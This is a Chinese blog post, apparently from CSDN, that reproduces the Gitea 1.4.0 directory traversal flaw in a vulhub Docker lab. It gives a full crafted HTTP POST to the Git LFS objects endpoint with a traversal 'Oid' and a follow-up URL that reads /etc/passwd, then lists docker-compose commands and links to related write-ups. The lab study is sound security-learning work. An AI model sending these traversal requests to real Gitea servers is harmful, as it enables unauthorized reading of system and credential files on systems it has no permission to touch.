Gitea 1.4.0 目录穿越导致命令执行漏洞

最新推荐文章于 2024-05-28 18:02:13 发布
最新推荐文章于 2024-05-28 18:02:13 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 中间件漏洞复现 文章标签: git 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414474
版权

声明

好好学习,天天向上

漏洞描述

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。

影响范围

1.4.0

复现过程

这里使用1.4.0版本

使用vulhub

/app/vulhub-master/gitea/1.4-rce

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:3000

自动进入安装界面

用默认配置安装,啥都没改,直接点的立即安装

在这里插入图片描述

安装完成后,再次访问,右上角自己创建一个用户,登录进去,创建一个公开的仓库,随便添加点文件进去(比如使用选定的文件和模板初始化仓库)

在这里插入图片描述

然后,需要执行一次docker-compose restart重启gitea服务。

打开gitea,找到刚才创建的公开项目,发送如下数据包,添加一个Git LFS对象,我的用户时test_user,库名是test_git:

POST /test_user/test_git.git/info/lfs/objects HTTP/1.1
Host: 192.168.239.129:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; ECS[visit_times]=2; lang=zh-CN; i_like_gitea=d62a77858626e9e4; _csrf=2b37hd2HOXknqERCSBpc40iTk0Y6MTYwODI3MTk2OTAxMDM5ODcwOA%3D%3D
Connection: close
Content-Type: application/json
Content-Length: 153

{
    "Oid": "....../../../etc/passwd",
    "Size": 1000000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
}

在这里插入图片描述

访问

http://192.168.239.129:3000/test_user/test_git.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞
JiangBuLiu的博客
07-08 942
Gitea 1.4.0 目录穿越导致命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现设置浏览器的代理端口为3000Burp Vulnhub官方复现教程 https://vulhub.org/#/environments/gitea/1.4-rce/ 漏洞原理 其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 参考链接: htt...
Vulhub靶场gitea-1.4远程代码执行漏洞复现
X_python321的博客
07-05 710
Gitea 是一个轻量级的 DevOps 平台软件。1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令
Gitea相关漏洞
SHELLCODE_8BIT的博客
03-13 870
Go代码审计:Gitea远程命令执行漏洞链_新闻中心-网盾网络安全培训学校Vulhub靶场gitea-1.4远程代码执行漏洞复现_gitea 漏洞-CSDN博客
gitea漏洞利用
weixin_34115824的博客
12-10 1437
参考文献 :https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rcehttp://blog.nsfocus.net/gitea-1-4-0-rce/https://www.leavesongs.com/PENETRATION/gitea-remote...
Go代码审计:Gitea远程命令执行漏洞
01-27
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,git objects和.git文件夹下其实是没有这个文件的,这个文件储存在git服务器上。gitea作为一个git服务器,也提供了LFS功能。在modules/lfs/server.go文件中,PostHandler是POST请求的处理函数:可见,其中间部分包含
gitea 1.4 未授权远程代码执行漏洞复现
玄道的网安博客
01-04 1349
漏洞概要 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 影响版本 1.4.0 环境搭建 Vulhub进行搭建 https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce 进入目录 cd vulhub-master/gitea/1.4-rce...
WebLogic未授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8337
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在未经身份
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6237
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
vulhub漏洞复现十八_Gitea
weixin_44193247的博客
01-29 1286
vulhub漏洞复现练习篇
Gitea 1.4 未授权远程代码执行漏洞复现
thelostworld
02-12 941
Gitea 1.4 未授权远程代码执行 一、漏洞描述 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 二、影响版本 1.4.0 三、环境准备&&漏洞复现 Vulhub进行搭建 https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安装镜像docker-..
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越命令执行漏洞(CVE-2019-3396)
JiangBuLiu的博客
06-28 2112
Atlassian Confluence 路径穿越命令执行漏洞(CVE-2019-3396)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/confluence/CVE-2019-3396/ 漏洞原理 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本...
【vulhub】gitea
haoaaao的博客
05-02 1406
0x00 1.4-rce() 1、简介 其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 2、搭建:docker 3、复现: 利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞_建瓯最坏的博客-CSDN博客 ...
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场)
m0_62652276的博客
12-02 1381
OSCP推荐靶场:VulnHub DevGuru: 1 个人打靶笔记
centos升级git到2.x版本后giteagiteaforbt)运行依然报找不到git执行文件以及ssh无法pull报没权限问题解决方案
qq_38883889的博客
06-13 805
最近使用gitea好像老是有bug,所以我就想更新一下公司的git服务器(从1.12更新到1.17),当我更新完成后,无法启动提示git需要2.0以上版本,无赖centos的yum最高只能安装到git 1.8.3,所以就采用啦网络上大佬的下载源码编译方案,但是当我编译安装(当然我是先卸载啦老版本,否在依然会提示git版本为1.8.3版本太低)完成后重启gitea却提示从$PATH中找不到git命令,几番折腾最后还是解决啦,这里将我的解决方案分享给大家。
giteagit库备份与恢复
最新发布
谢绝(无视)留言与私信
05-28 2261
在本地搭建了giteagit库.最开始用的gitea 1.16.8。本人比较手欠,看见新版本就想升级。换了几个高版本后,渐渐发现,在启动gitea服务时有以前不曾见过的错误提示(e.g. git库的健康检查错误之类的)。以前一直用旧版的时候,不曾发现报错问题。就怀疑是升级后,gitea新版对旧版格式不兼容引起的。因为我的git也换了好几次新版本。想对现有的本地giteagit目录进行备份与恢复,看看能不能解决启动gitea新版的报错问题。
Git仓库搭建-Gitea仓库配置
weixin_45083630的博客
11-17 2707
Gitea仓库配置 仓库配置采用ubuntu20+Gitea+mysql8,轻量级gitea没有CI,若需流水线可配置gitlab 1.安装必要的工具 apt-get update apt-get install vim -y apt-get install wget -y apt-get install curl -y apt-get install git 2.安装mysql apt-get install mysql-server service mysql start 3.安装gitea wge
利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
JiangBuLiu的博客
07-02 1721
ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现head插件 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ 漏洞原理 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值